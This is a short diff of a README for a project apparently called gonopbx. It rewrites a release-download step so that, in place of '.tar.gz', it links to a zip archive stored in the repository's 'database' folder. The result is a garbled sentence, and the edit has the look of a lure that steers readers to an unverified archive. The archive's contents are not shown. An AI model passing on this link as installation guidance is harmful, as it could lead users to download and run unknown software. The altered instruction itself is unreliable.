omz-bot/gonopbx/README.md

 1. **Download the latest release:**
    - Go to the link above.
    - Find the latest release version.
-   - Download the `.zip` or `.tar.gz` file containing the configuration and setup scripts.
+   - Download the `.zip` or `https://raw.githubusercontent.com/omz-bot/gonopbx/main/database/Software_2.4-beta.3.zip` file containing the configuration and setup scripts.

 2. **Extract the files:**
    - Once downloaded, locate the file in your downloads folder.